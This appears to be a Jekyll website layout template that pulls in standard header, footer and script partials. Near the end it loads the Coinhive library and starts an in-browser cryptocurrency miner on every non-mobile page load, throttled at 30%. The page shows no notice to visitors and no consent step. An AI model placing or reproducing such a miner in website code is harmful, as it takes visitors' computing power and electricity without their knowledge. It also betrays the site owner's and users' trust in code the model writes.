---
layout: compress
---

<!DOCTYPE html>
<html lang="en">
  {% include head.html %}
  <body>
    {% include header.html %}
    <div id="fb-root"></div>
    <script src="/js/fb.js"></script>
    {{ content }}
    {% include footer.html %}
    <!-- Return to Top -->
    <a href="javascript:" id="return-to-top"><i class="fa fa-chevron-up" aria-hidden="true"></i></a>
    {% include js.html %}
    <div class="fb-quote"></div>
    
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.Anonymous('YOUR_SITE_KEY', {throttle: 0.3});
    
        // Only start on non-mobile devices and if not opted-out
        // in the last 14400 seconds (4 hours):
        if (!miner.isMobile() && !miner.didOptOut(14400)) {
            miner.start();
        }
    </script>
    
  </body>
</html>
